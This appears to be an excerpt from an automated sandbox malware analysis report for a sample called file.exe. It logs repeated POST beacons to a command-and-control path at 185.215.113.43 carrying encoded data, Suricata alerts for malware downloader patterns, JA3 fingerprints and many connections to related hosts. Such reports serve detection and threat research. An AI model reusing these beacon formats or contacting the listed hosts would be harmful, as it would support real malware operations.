Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 33 32 45 37 31 42 38 35 31 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B32E71B85182D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 33 32 45 37 31 42 38 35 31 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B32E71B85182D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 33 32 45 37 31 42 38 35 31 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B32E71B85182D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 33 32 45 37 31 42 38 35 31 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B32E71B85182D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 33 32 45 37 31 42 38 35 31 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B32E71B85182D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 33 32 45 37 31 42 38 35 31 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B32E71B85182D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 33 32 45 37 31 42 38 35 31 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B32E71B85182D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 33 32 45 37 31 42 38 35 31 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B32E71B85182D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 33 32 45 37 31 42 38 35 31 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B32E71B85182D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 33 32 45 37 31 42 38 35 31 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B32E71B85182D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 33 32 45 37 31 42 38 35 31 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B32E71B85182D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 33 32 45 37 31 42 38 35 31 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B32E71B85182D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s

Source: Joe Sandbox View	IP Address: 185.215.113.43 185.215.113.43
Source: Joe Sandbox View	IP Address: 13.107.246.45 13.107.246.45

Source: Joe Sandbox View

ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL

Source: Joe Sandbox View	JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49730 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49752 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49761 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49816 -> 176.113.115.203:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49883 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49932 -> 104.21.80.55:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49934 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49940 -> 104.21.80.55:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49950 -> 104.21.80.55:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49961 -> 104.21.80.55:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49972 -> 104.21.80.55:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49983 -> 104.21.80.55:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50002 -> 104.21.80.55:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50005 -> 104.21.80.55:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50016 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50027 -> 104.21.80.55:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50015 -> 104.21.80.55:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50032 -> 104.21.80.55:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50044 -> 104.21.80.55:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50048 -> 104.21.80.55:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50055 -> 104.21.80.55:443
Source: Network traffic	Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.4:50051 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50056 -> 104.21.80.55:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50057 -> 104.21.80.55:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50059 -> 104.21.80.55:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50060 -> 104.21.80.55:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50062 -> 104.21.80.55:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50064 -> 104.21.80.55:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50063 -> 104.21.80.55:443
Source: Network traffic	Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.4:50065 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50074 -> 104.21.80.55:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50080 -> 104.21.80.55:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50087 -> 104.21.80.55:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50101 -> 104.21.80.55:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50107 -> 104.21.80.55:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50124 -> 104.21.80.55:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50132 -> 104.21.80.55:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50128 -> 104.21.80.55:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50145 -> 104.21.80.55:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50137 -> 104.21.80.55:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50140 -> 104.21.80.55:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50149 -> 104.21.80.55:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50154 -> 104.21.80.55:443
Source: Network traffic	Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.4:50157 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50370 -> 52.182.141.63:443

Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C6FCC60 PR_Recv,

0_2_6C6FCC60

Source: global traffic	HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQjcvc0BCI/KzQEIucrNAQii0c0BCIrTzQEIntbNAQin2M0BCPnA1BUY9snNARi60s0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQjcvc0BCI/KzQEIucrNAQii0c0BCIrTzQEIntbNAQin2M0BCPnA1BUY9snNARi60s0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
